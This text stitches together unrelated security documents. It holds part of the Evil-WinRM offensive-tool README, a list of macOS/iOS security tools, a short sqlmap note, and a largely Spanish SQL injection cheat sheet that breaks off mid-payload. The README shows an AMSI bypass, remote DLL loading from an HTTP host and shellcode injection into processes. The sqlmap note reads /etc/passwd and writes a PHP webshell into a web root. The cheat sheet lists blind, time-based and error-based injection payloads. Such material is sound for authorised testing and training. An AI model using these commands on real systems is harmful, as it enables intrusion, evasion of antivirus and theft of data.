|__ /_____/ \ /| | | \ | \/ Y \ /_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ / \/ \/ \/ \/ \/ By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers [+] Dll-Loader [+] Donut-Loader [+] Invoke-Binary [+] Bypass-4MSI [+] services [+] upload [+] download [+] menu [+] exit ``` ### Load powershell scripts - To load a ps1 file you just have to type the name (auto-completion using tab allowed). The scripts must be in the path set at `-s` argument. Type menu again and see the loaded functions. Very large files can take a long time to be loaded. ``` *Evil-WinRM* PS C:\> PowerView.ps1 *Evil-WinRM* PS C:\> menu ,. ( . ) " ,. ( . ) . (" ( ) )' ,' ( ' (" ) )' ,' . ,) .; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( _".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _') \_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \ | __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \ | \\ /| | |__ /_____/ \ /| | | \ | \/ Y \ /_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ / \/ \/ \/ \/ \/ By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers [+] Add-DomainAltSecurityIdentity [+] Add-DomainGroupMember [+] Add-DomainObjectAcl [+] Add-RemoteConnection [+] Add-Win32Type [+] Convert-ADName [+] Convert-DNSRecord [+] ConvertFrom-LDAPLogonHours [+] ConvertFrom-SID [+] ConvertFrom-UACValue [+] Convert-LDAPProperty [+] Convert-LogonHours [+] ConvertTo-SID [+] Dll-Loader [+] Donut-Loader [+] Export-PowerViewCSV [+] field [+] Find-DomainLocalGroupMember ``` ### Advanced commands - Invoke-Binary: allows .Net assemblies to be executed in memory. The name can be auto-completed using tab key. Arguments for the exe file can be passed comma separated. Example: `Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'`. The executables must be in the path set at `-e` argument. ``` *Evil-WinRM* PS C:\> Invoke-Binary .SYNOPSIS Execute binaries from memory. PowerShell Function: Invoke-Binary Author: Luis Vacas (CyberVaca) Required dependencies: None Optional dependencies: None .DESCRIPTION .EXAMPLE Invoke-Binary /opt/csharp/Watson.exe Invoke-Binary /opt/csharp/Binary.exe param1,param2,param3 Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3' Description ----------- Function that execute binaries from memory. *Evil-WinRM* PS C:\> Invoke-Binary /opt/csharp/Rubeus.exe ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.0.0 Ticket requests and renewals: ``` - Dll-Loader: allows loading dll libraries in memory, it is equivalent to: `[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))` The dll file can be hosted by smb, http or locally. Once it is loaded type `menu`, then it is possible to autocomplete all functions. ``` *Evil-WinRM* PS C:\> Dll-Loader .SYNOPSIS dll loader. PowerShell Function: Dll-Loader Author: Hector de Armas (3v4Si0N) Required dependencies: None Optional dependencies: None .DESCRIPTION . .EXAMPLE Dll-Loader -smb -path \\192.168.139.132\\share\\myDll.dll Dll-Loader -local -path C:\Users\Pepito\Desktop\myDll.dll Dll-Loader -http -path http://example.com/myDll.dll Description ----------- Function that loads an arbitrary dll *Evil-WinRM* PS C:\> Dll-Loader -http http://10.10.10.10/SharpSploit.dll [+] Reading dll by HTTP [+] Loading dll... *Evil-WinRM* PS C:\Users\test\Documents> menu [... Snip ...] *Evil-WinRM* PS C:\> [SharpSploit.Enumeration.Host]::GetProcessList() Pid : 0 Ppid : 0 Name : Idle Path : SessionID : 0 Owner : Architecture : x64 ``` - Donut-Loader: allows to inject x64 payloads generated with awesome [donut] technique. No need to encode the payload.bin, just generate and inject! ``` *Evil-WinRM* PS C:\> Donut-Loader .SYNOPSIS Donut Loader. PowerShell Function: Donut-Loader Author: Luis Vacas (CyberVaca) Based code: TheWover Required dependencies: None Optional dependencies: None .DESCRIPTION .EXAMPLE Donut-Loader -process_id 2195 -donutfile /home/cybervaca/donut.bin Donut-Loader -process_id (get-process notepad).id -donutfile /home/cybervaca/donut.bin Description ----------- Function that loads an arbitrary donut :D ``` You can use this [donut-maker] to generate the payload.bin if you don't use Windows. This script use a python module written by Marcello Salvati ([byt3bl33d3r]). It could be installed using pip: `pip3 install donut-shellcode` ``` python3 donut-maker.py -i Covenant.exe ___ _____ .'/,-Y" "~-. l.Y ^. /\ _\_ Donuts! i ___/" "\ | /" "\ o ! l ] o !__./ \ _ _ \.___./ "~\ X \/ \ ___./ ( \ ___. _..--~~" ~`-. ` Z,-- / \ \__. ( / ______) \ l /-----~~" / Y \ / | "x______.^ | \ j Y [+] Donut generated successfully: payload.bin ``` - Bypass-4MSI: patchs AMSI protection. ``` *Evil-WinRM* PS C:\> #amsiscanbuffer At line:1 char:1 + #amsiscanbuffer + ~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand *Evil-WinRM* PS C:\> *Evil-WinRM* PS C:\> Bypass-4MSI [+] Success! *Evil-WinRM* PS C:\> #amsiscanbuffer *Evil-WinRM* PS C:\> ``` ### Kerberos - First you have to sync date with the DC: `rdate -n <dc_ip>` - To generate ticket there are many ways: * Using [ticketer.py] from impacket * If you get a kirbi ticket using [Rubeus] or [Mimikatz] you have to convert to ccache using [ticket_converter.py] - Add ccache ticket. There are 2 ways: `export KRB5CCNAME=/foo/var/ticket.ccache` `cp ticket.ccache /tmp/krb5cc_0` - Add realm to `/etc/krb5.conf` (for linux). Use of this format is important: ``` CONTOSO.COM = { kdc = fooserver.contoso.com } ``` - Check Kerberos tickets with `klist` - To remove ticket use: `kdestroy` - For more information about Kerberos check this [cheatsheet] ### Remote path completion This feature could be not available depending of the ruby you are using. It must be compiled with readline support. Otherwise, this feature will not work (a warning will be shown). #### Method 1 (compile the needed extension) Using this method you'll compile ruby with the needed readline feature but to use only the library without changing the default ruby version on your system. Because of this, is the most recommended method. Let's suppose that you have in your Debian based system ruby 2.7.3: ``` # Install needed package apt install libreadline-dev # Check your ruby version ruby --version ruby 2.7.3p183 (2021-04-05 revision 6847ee089d) [x86_64-linux-gnu] # Download ruby source code (2.7.3 in this case): wget https://ftp.ruby-lang.org/pub/ruby/2.7/ruby-2.7.3.tar.gz # Extract source code tar -xf ruby-2.7.3.tar.gz # Compile the readline extension: cd ruby-2.7.3/ext/readline ruby ./extconf.rb make # Patch current version of the ruby readline extension: sudo cp /usr/lib/x86_64-linux-gnu/ruby/2.7.0/readline.so /usr/lib/x86_64-linux-gnu/ruby/2.7.0/readline.so.bk sudo cp -f readline.so /usr/lib/x86_64-linux-gnu/ruby/2.7.0/readline.so ``` #### Method 2 (Install ruby to use it only for evil-winrm using rbenv) Let's suppose that you want ruby 2.7.1 on a Debian based Linux and you are using zsh. This script will automatize it. You'll need to launch it from the same dir where evil-winrm.rb and Gemfile is located (the evil-winrm created dir after a git clone for example): ``` #!/usr/bin/env zsh # Uninstall possible current installed versions sudo gem uninstall evil-winrm -q gem uninstall evil-winrm -q # Install rbenv sudo apt install rbenv # Config rbenv on zshrc config file echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.zshrc echo 'eval "$(rbenv init -)"' >> ~/.zshrc source ~/.zshrc # Install ruby with readline support export RUBY_CONFIGURE_OPTS=--with-readline-dir="/usr/include/readline" rbenv install 2.7.1 # Create file '.ruby-version' to set right ruby version rbenv local 2.7.1 # Install local gems gem install bundler bundle install current_evwr="$(pwd)/evil-winrm.rb" sudo bash -c "cat << 'EOF' > /usr/bin/evil-winrm #!/usr/bin/env sh "${current_evwr}" "\$@" EOF" sudo chmod +x /usr/bin/evil-winrm ``` Then you can safely launch evil-winrm using the new installed ruby with the required readline support from any location. #### Method 3 (compile entire ruby) If you want to compile it yourself, you can follow these steps. Let's suppose that you want ruby 2.7.3: ``` wget -O ruby-install-0.8.1.tar.gz https://github.com/postmodern/ruby-install/archive/v0.8.1.tar.gz tar -xzvf ruby-install-0.8.1.tar.gz cd ruby-install-0.8.1/ sudo make install ruby-install ruby 2.7.3 -- --with-readline-dir=/usr/include/readline ``` Depending of your system it will be installed at `/opt/rubies/ruby-2.7.3` or maybe at ` ~/.rubies/ruby-2.7.3`. Now just need to install evil-winrm dependencies for that new installed ruby version. The easiest way is to launch command `/opt/rubies/ruby-2.7.3/bin/gem install evil-winrm`. The gem command used must be belonging to the new ruby installation. After that, you can launch safely your new installed ruby to use it on evil-winrm: `/opt/rubies/ruby-2.7.3/bin/ruby ./evil-winrm.rb -h` It is recommended to use this new installed ruby only to launch evil-winrm. If you set it up as your default ruby for your system, bear in mind that it has no dependency gems installed. Some ruby based software like Metasploit or others could not start correctly due dependencies problems. ### Logging This feature will create files on your $HOME dir saving commands and the outputs of the WinRM sessions ## Changelog: Changelog and project changes can be checked here: [CHANGELOG.md](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/CHANGELOG.md) ## Credits: Staff: - [Cybervaca], (founder). Twitter: [@CyberVaca_] - [OscarAkaElvis], Twitter: [@OscarAkaElvis] - [Jarilaos], Twitter: [@_Laox] - [arale61], Twitter: [@arale61] Hat tip to: - [Vis0r] for his personal support. - [Alamot] for his original code. - [3v4Si0N] for his awesome dll loader. - [WinRb] All contributors of ruby library. - [TheWover] for his awesome donut tool. - [byt3bl33d3r] for his python library to create donut payloads. - [Sh11td0wn] for inspiration about new features. - [Borch] for his help adding logging feature. - [Hackplayers] for giving a shelter on their github to this software. ## Disclaimer & License This script is licensed under LGPLv3+. Direct link to [License](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/LICENSE). Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission. <!-- Github URLs --> [Cybervaca]: https://github.com/cybervaca [OscarAkaElvis]: https://github.com/OscarAkaElvis [Jarilaos]: https://github.com/jarilaos [arale61]: https://github.com/arale61 [Vis0r]: https://github.com/vmotos [Alamot]: https://github.com/Alamot [3v4Si0N]: https://github.com/3v4Si0N [Borch]: https://github.com/Stoo0rmq [donut]: https://github.com/TheWover/donut [donut-maker]: https://github.com/Hackplayers/Salsa-tools/blob/master/Donut-Maker/donut-maker.py [byt3bl33d3r]: https://twitter.com/byt3bl33d3r [WinRb]: https://github.com/WinRb/WinRM/graphs/contributors [TheWover]: https://github.com/TheWover [Sh11td0wn]: https://github.com/Sh11td0wn [ticketer.py]: https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py [ticket_converter.py]: https://github.com/Zer1t0/ticket_converter [Rubeus]: https://github.com/GhostPack/Rubeus [Mimikatz]: https://github.com/gentilkiwi/mimikatz [cheatsheet]: https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a [Dockerhub]: https://hub.docker.com/r/oscarakaelvis/evil-winrm [Hackplayers]: https://www.hackplayers.com/ <!-- Twitter URLs --> [@CyberVaca_]: https://twitter.com/CyberVaca_ [@OscarAkaElvis]: https://twitter.com/OscarAkaElvis [@_Laox]: https://twitter.com/_Laox [@arale61]: https://twitter.com/arale61 <!-- Badges URLs --> [Version-shield]: https://img.shields.io/badge/version-3.5-blue.svg?style=flat-square&colorA=273133&colorB=0093ee "Latest version" [Ruby2.3-shield]: https://img.shields.io/badge/ruby-2.3%2B-blue.svg?style=flat-square&colorA=273133&colorB=ff0000 "Ruby 2.3 or later" [License-shield]: https://img.shields.io/badge/license-LGPL%20v3%2B-blue.svg?style=flat-square&colorA=273133&colorB=bd0000 "LGPL v3+" [Docker-shield]: https://img.shields.io/docker/cloud/automated/oscarakaelvis/evil-winrm.svg?style=flat-square&colorA=273133&colorB=a9a9a9 "Docker rules!" [Gem-Version]: https://badge.fury.io/rb/evil-winrm.svg "Ruby gem"
# macOS and iOS Security Related Tools [![Awesome](https://awesome.re/badge-flat.svg)](https://awesome.re) <a href="https://github.com/ashishb/osx-and-ios-security-awesome/actions">![Test](https://github.com/ashishb/osx-and-ios-security-awesome/workflows/Test/badge.svg)</a> ## Contents - [macOS Security](#macos-security) - [iOS Security](#ios-security) - [iOS Jailbreaks](#ios-jailbreaks) ## macOS Security 1. [OSX collector](https://github.com/Yelp/OSXCollector) - Forensic analysis. 2. [OSX auditor](https://github.com/jipegit/OSXAuditor) - Forensic analysis. 3. [mac_apt](https://github.com/ydkhatri/mac_apt) - macOS Artifact Parsing Tool for forensic analysis. 4. [MIDAS](https://github.com/etsy/MIDAS) - macOS Intrusion Detection Analysis System. 5. [Santa](https://github.com/google/santa) - Binary whitelisting/blacklisting system. 6. [Masochist](https://github.com/squiffy/Masochist) - Framework for creating XNU based rootkits. 7. [Class-dump](http://stevenygard.com/projects/class-dump/) - Command-line utility to dump Objective-C runtime information. 8. [Mach inject](https://github.com/rentzsch/mach_inject) - Inter process code injection for macOS. 9. [Task vaccine](https://github.com/rodionovd/task_vaccine) - Similar to mach inject. 10. [Hopper](http://www.hopperapp.com/) - Hopper disassembler (not free). 11. [Mach-O diff](https://github.com/samdmarshall/machodiff) - Mach-o diffing tool. 12. [Mac4n6](https://github.com/pstirparo/mac4n6) - A collection of macOS and iOS forensic artifacts. 13. [XGuardian scanner](https://github.com/openscanner/XGuardian) - Security Scanner for macOS. 14. [Crashwalk](https://github.com/bnagy/crashwalk) - Bucket and triage on-disk crashes 15. [PassiveFuzzFrameworks](https://github.com/SilverMoonSecurity/PassiveFuzzFrameworkOSX) 16. [osquery](https://github.com/facebook/osquery) - Cross-platform tool for data collection and forensic analysis. 17. [stronghold](https://github.com/alichtman/stronghold) - Easily configure macOS security settings from the terminal. 18. [BlockBlock](https://objective-see.com/products/blockblock.html) - BlockBlock continually monitors common persistence locations and displays an alert whenever a persistent component is added to the OS. 19. [Dylib Hijack Scanner](https://objective-see.com/products/dhs.html) - Simple utility that will scan your computer for applications that are either susceptible to dylib hijacking or have been hijacked. 20. [KextViewer](https://objective-see.com/products/kextviewr.html) - View all modules on that are loaded in the OS kernel. 21. [KnockKnock](https://objective-see.com/products/knockknock.html) - See what's persistently installed on your Mac. 22. [LinkLiar](http://halo.github.io/LinkLiar) - Link-Layer MAC spoofing GUI for macOS. 23. [LockDown](https://objective-see.com/products/lockdown.html) - Open-source tool for El Capitan that audits and remediates security configuration settings. 24. [MalwareBytes](https://www.malwarebytes.com/mac-download/) - Malwarebytes crushes the growing threat of Mac malware, so you are protected and your machine keeps running silky smooth. Cybersecurity smart enough for the Mac. 25. [OverSight](https://objective-see.com/products/oversight.html) - Monitor mic and webcam, alerting you when the internal mic is activated, or whenever a process accesses the webcam. 26. [RansomWhere?](https://objective-see.com/products/ransomwhere.html) - Ransomware Detection. 27. [TaskExplorer](https://objective-see.com/products/taskexplorer.html) - Explore all processes running on your Mac with TaskExplorer. 28. [What's Your Sign?](https://objective-see.com/products/whatsyoursign.html) - Adds menu item to Finder.app to display the cryptographic signing information for any file. 29. [FSMonitor](http://fsmonitor.com/) - Monitor all changes in the file system. 30. [Pareto Security](https://github.com/paretoSecurity/pareto-mac/) - A MenuBar app to automatically audit your Mac for basic security hygiene. 31. [Mana Security](https://github.com/manasecurity/mana-security-app) - Vulnerability Management app for individuals. It helps to keep macOS and installed applications updated. ## iOS Security A collection of ios security related resources 1. [IDB](https://github.com/dmayer/idb) - iOS App Security Assessment Tool 2. [iRET](https://github.com/S3Jensen/iRET) - iOS Reverse Engineering Toolkit 3. [DVIA](http://damnvulnerableiosapp.com/) - Damn Vulnerable iOS App for learning 4. [LibiMobileDevice](https://github.com/libimobiledevice/libimobiledevice) - A cross-platform protocol library to communicate with iOS devices 5. [Needle](https://github.com/mwrlabs/needle) - iOS App Pentesting Tool 7. [imobax](https://github.com/Siguza/imobax) - iOS Mobile Backup Extractor 8. [iMessage Fuzzing](https://github.com/googleprojectzero/iOS-messaging-tools) - iMessage fuzzing tools from Google's Project Zero 6. ~~[AppCritique](https://appcritique.boozallen.com) - iOS App Security Assessment Tool~~ ## iOS Jailbreaks 1. [PhoenixPwn](https://phoenixpwn.com) - Jailbreak for 9.3.5 32-bit devices. ### Other Awesome Lists Other amazingly awesome lists can be found in the [awesome-awesomeness](https://github.com/bayandin/awesome-awesomeness) list. --- ## License <a rel="license" href="https://creativecommons.org/licenses/by-sa/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://licensebuttons.net/l/by-sa/4.0/88x31.png" /></a><br />This work is licensed under a <a rel="license" href="https://creativecommons.org/licenses/by-sa/4.0/">Creative Commons Attribution-ShareAlike 4.0 International License</a>.
# SQLI tricks ## GET ### Error-Based ### Simple test `Adding a simpe quote '` Example: `http://192.168.1.104/Less-1/?id=5'` ### Checking Privileges Using Sql-map `./sqlmap.py -u http://localhost/Less-1/?id=1 --privileges | grep FILE` ### Reading file `./sqlmap.py -u <URL> --file-read=<file to read>` `./sqlmap.py -u http://localhost/Less-1/?id=1 --file-read=/etc/passwd` ### Writing file `./sqlmap.py -u <url> --file-write=<file> --file-dest=<path>` `./sqlmap.py -u http://localhost/Less-1/?id=1 --file-write=shell.php --file-dest=/var/www/html/shell-php.php` ## POST `./sqlmap.py -u <POST-URL> --data="<POST-paramters> "` `./sqlmap.py -u http://localhost/Less-11/ --data "uname=teste&passwd=&submit=Submit" -p uname` You can also use a file like with the post request: `./sqlmap.py -r post-request.txt -p uname`
# SQL injection A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. Attempting to manipulate SQL queries may have goals including: - Information Leakage - Disclosure of stored data - Manipulation of stored data - Bypassing authorization controls ## Tools - sqlmap ## Summary * [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md) * [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md) * [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md) * [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) * [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md) * [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md) * [Entry point detection](#entry-point-detection) * [Basic Detection](#basic-detection) * [Blind Detection](#blind-detection) * [Time-Based Detection](time-based-detection) * [DBMS Identification](#dbms-identification) * [SQL injection using SQLmap](#sql-injection-using-sqlmap) * [Basic arguments for SQLmap](#basic-arguments-for-sqlmap) * [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent) * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie) * [Second order injection](#second-order-injection) * [Shell](#shell) * [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit) * [Using TOR with SQLmap](#using-tor-with-sqlmap) * [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap) * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy) * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) * [SQLmap without SQL injection](#sqlmap-without-sql-injection) * [Authentication bypass](#authentication-bypass) * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection) * [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update) * [WAF Bypass](#waf-bypass) * [Manual Exploitation](#manual-exploitation) ## Entry point detection Detection of an SQL injection entry point Simple characters ```sql ' %27 " %22 # %23 ; %3B ) Wildcard (*) &apos; # required for XML content ``` Multiple encoding ```sql %%2727 %25%27 ``` Merging characters ```sql `+HERP '||'DERP '+'herp ' 'DERP '%20'HERP '%2B'HERP ``` Logic Testing ```sql page.asp?id=1 or 1=1 -- true page.asp?id=1' or 1=1 -- true page.asp?id=1" or 1=1 -- true page.asp?id=1 and 1=2 -- false ``` Weird characters ```sql Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (") Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') ``` ## Basic Detection ### Inyección en Domain ``` https://domain.com/%2527 ``` ``` https://domain.com/%27 ``` ``` https://domain.com/' ``` ### E-mail address payloads SQLi You can use this in any field of "e-mail". (recover your password, for example) ``` [email protected] "a"@.com test [email protected] "test example"@test.com [email protected] asd [email protected] \"asd a\"@a.com asd(a)@a.com \"asd(a)\"@a.com asd'[email protected] asd'or'1'='[email protected] a'-IF(LENGTH(database())>9,SLEEP(8),0)or'1'='[email protected] a'AND%20SLEEP(8)%20or'1'='[email protected] \"a'-IF(LENGTH(database())>9,SLEEP(8),0)or'1'='1\@a.com "' OR 1=1 -- '"@example.com ``` ### Testear comillas SIMPLES para detectar errores 500 ``` Cookie: parametro=xyz' (500 Error) Cookie: parametro=xyz'' (200 OK) ``` Luego verificar que efectivamente se trata de un error SQL y no otro tipo de error. ``` Cookie: parametro=xyz'||(SELECT '')||' (500) Cookie: parametro=xyz'||(SELECT '' FROM dual)||' (200) (ORACLE DB) ``` ### Testear en Cada PATH de la URL Request Original: ``` /mistery/develop/public/index.php (200 OK) ``` Testing de Posibles Puntos de Entrada: ``` /mistery'/develop/public/index.php (40X, 50X Error) /mistery/develop'/public/index.php (40X, 50X Error) /mistery/develop/public'/index.php (40X, 50X Error) /mistery/develop/public/index.php' (40X, 50X Error) ``` ### Clean URL y Parámetros Ocultos Cuando se encuentra una URL como la siguiente: ``` https://example.com/questions/whatever/10/session-management ``` Se debe descubrir el **SLAG**. Este **SLUG** siempre se identifica con un carácter `-` cuando existe más de una palabra final. Luego de saber que se encuentra contra una **Clean URL**, debe identificar qué parte de la URL es un parámetro oculto. Para verificar que el valor `10`, por ejemplo, es un **parámetro oculto**, utilice operaciones algebraicas: ``` https://example.com/questions/whatever/9+1/session-management ``` ``` https://example.com/questions/whatever/9%2b%31/session-management ``` Una vez que detecta un/unos parámetro/s concreto/s, ingrese comillas simples `'` para romper sintaxis y entradas no sanitizadas: ``` https://example.com/questions'/whatever/10/session-management ``` ``` https://example.com/questions/whatever'/10/session-management ``` ``` https://example.com/questions/whatever/10'/session-management ``` Para testear con SQLMAP: ``` sqlmap -u https://example.com/questions/whatever/10*/session-management sqlmap -u https://example.com/questions/whatever/10*/ ``` ### Comilla Simple o Doble, luego el Payload sin comillas Cuando se detecte un comportamiento diferente en la respueta con `'` o `"`: ``` { "sortColumnName":"index", "sortType":"asc","searchKey":"1'" } ``` ``` { "status":4009, "data":null, "message":"Database error, Something went wrong while processing data." } ``` Es recomendable insertar algún payload sin comillas: ``` { "sortColumnName":"index", "sortType":"asc","searchKey":"1 waitfor delay'0:0:05'--" } ``` ### Elimitar Parámetros Uno por Uno Eliminar los parámetros de las consultas uno por uno y verificar si se produce algún error: ``` GET /path/vulnerable?variable1=value1&variable2=value2&variable3=value3 ``` ``` HTTP/2 200 OK ``` Se elimina variable1 y esto produce un error: ``` GET /path/vulnerable?variable2=value2&variable3=value3 ``` ``` HTTP/2 500 Internal Server Error ``` ### Inyección en "Host", "User-Agent", "Referer", "Location" and "Cookie" ``` Host: example.com' Referer: example.com" User-Agent: <user-agent>\ Cookie: my_cookie:123\ Cookie: my_cookie:123' Cookie: my_cookie:123" ``` ### Content-Length ``` Content-Length: '%20or%201%3d1%2d%2d (' or 1=1 --) (200 OK) Content-Length: <parteOK>%20or%201%3d01 ( or 1=1 --) (200 OK) Content-Length: <parteOK>'%20or%201%3d01 (' or 1=1 --) (200 OK) ``` ``` Content-Length: '%20or%201%3d2%2d%2d (' or 1=2 --) (40X) Content-Length: <parteOK>%20or%201%3d2%2d%2d ( or 1=2 --) (40X) Content-Length: <parteOK>'%20or%201%3d2%2d%2d (' or 1=2 --) (40X) ``` ``` ';SELECT pg_sleep(10);-- (testear TimeBased en Postgres) '%3bSELECT%20pg_sleep(10);%20-- (testear TimeBased en Postgres) ``` ### Recuperar Datos Ocultos Si ambas consultas dan resultados distintos: ``` https://insecure-website.com/products?category=Gifts https://insecure-website.com/products?category=Gifts'-- ``` Debe probar lo siguiente para que la aplicación muestre todos los productos en cualquier categoría, incluidas las categorías que no conoce: ``` https://insecure-website.com/products?category=Gifts'+OR+1=1-- ``` La consulta modificada devolverá todos los elementos en los que la categoría sea "Gifts" o "1=1". Dado que "1=1" siempre es verdadero, la consulta devolverá todos los elementos. ### Concatenación de Valor de Variable Este enfoque es diferente a las SQLi basadas en tiempo, desde el punto de vista que el escáner de BurpSuite no detecta la inyección Se debe utilizar una concatenación del payload insertado en el valor de la variable, como se muestra debajo: ``` TrackingId=qctP4ovscZ0HienO'||dbms_pipe.receive_message(('a'),10)-- #Oracle TrackingId=qctP4ovscZ0HienO'+ WAITFOR DELAY '0:0:10'-- #MicrosoftSQL TrackingId=qctP4ovscZ0HienO'||pg_sleep(10)-- #PostgreSQL TrackingId=qctP4ovscZ0HienO'||SELECT pg_sleep(10)-- #PostgreSQL TrackingId=qctP4ovscZ0HienO' sleep(10)-- #MySQL TrackingId=qctP4ovscZ0HienO' SELECT sleep(10)-- #MySQL TrackingId=qctP4ovscZ0HienO' CONCAT('1','SELECT sleep(10)')-- #MySQL ``` ## Blind Detection La aplicación se comporta de manera distinta cuando las condiciones son verdaderas o falsas. Inyectar en los parámetros de la "cookie": ``` Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4' AND '1'='1 ``` ``` Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4' AND '1'='2 ``` El primero de estos valores hará que la consulta devuelva resultados, porquela condición inyectada es verdadera. El segundo valor hará que la consulta no devuelva ningún resultado, o devuelva distintos resultados, porque la condición inyectada es falsa. - [ ] **Errores Condicionales (Blind SQLi)** Intentar: ``` Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4' --> Error 40X Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4'' --> 200 OK ``` Luego debe confirmar que el servidor interpreta la consulta como SQL, en lugar de cualquier otro tipo de error. Las siguientes consultas varían de la DB en el backend, una de ellas debería ser VERDADERA para confirmar una posible SQLi: ``` Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4'||(SELECT '')||' ``` ``` Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4'||(SELECT '' FROM dual)||' (Oracle) ``` Cuando la inyección de diferentes condiciones booleanas no hace ninguna diferencia en las respuestas de la aplicación, en esta situación, es posible inducir a la aplicación a devolver respuestas condicionales desencadenando errores de SQL de forma condicional, dependiendo de una condición inyectada. ``` Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a ``` ``` Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a ``` Primera entrada, se evalúa 'a', lo que no causa ningún error. Segunda entrada, se evalúa a 1/0, lo que provoca un error de división por cero. Suponiendo que el error causa alguna diferencia en la respuesta HTTP de la aplicación, podemos usar esta diferencia para inferir si la condición inyectada es verdadera. **Oracle:** ``` ' AND (SELECT CASE WHEN (1=2) THEN to_char(1/0) ELSE NULL END FROM dual)-- ``` ``` ' AND (SELECT CASE WHEN (1=1) THEN to_char(1/0) ELSE NULL END FROM dual)-- ``` **Microsoft SQL Server:** ``` ' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END)-- ``` ``` ' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END)-- ``` **PostgreSQL:** ``` ' AND (SELECT CASE WHEN (1=2) THEN cast(1/0 as text) ELSE NULL END)-- ``` ``` ' AND (SELECT CASE WHEN (1=1) THEN cast(1/0 as text) ELSE NULL END)-- ``` **MySQL:** ``` ' AND (SELECT IF(1=2,(SELECT table_name FROM information_schema.tables),'a'))-- ``` ``` ' AND (SELECT IF(1=1,(SELECT table_name FROM information_schema.tables),'a'))--%20 ``` ## Time-Based Detection La aplicación detecta errores de la base de datos y los maneja correctamente. Activar un error de base de datos cuando se ejecuta la consulta SQL inyectada no causa ninguna diferencia en la respuesta de la aplicación, por lo que la técnica anterior de inducir errores condicionales no funcionará. Se debe explotar SQL ciega activando retrasos de tiempo condicionalmente, dependiendo de una condición inyectada. Las técnicas para activar un retraso de tiempo son muy específicas del tipo de base de datos que se utiliza: **Oracle:** ``` '; dbms_pipe.receive_message(('a'),10)-- ') dbms_pipe.receive_message(('a'),10)-- '); dbms_pipe.receive_message(('a'),10)-- ';) dbms_pipe.receive_message(('a'),10)-- ``` **Microsoft SQL Server:** ``` '; IF (1=2) WAITFOR DELAY '0:0:10'-- '; IF (1=1) WAITFOR DELAY '0:0:10'-- ') IF (1=2) WAITFOR DELAY '0:0:10'-- ') IF (1=1) WAITFOR DELAY '0:0:10'-- '); IF (1=2) WAITFOR DELAY '0:0:10'-- '); IF (1=1) WAITFOR DELAY '0:0:10'-- ';) IF (1=2) WAITFOR DELAY '0:0:10'-- ';) IF (1=1) WAITFOR DELAY '0:0:10'-- '; WAITFOR DELAY '0:0:10'-- '; WAITFOR 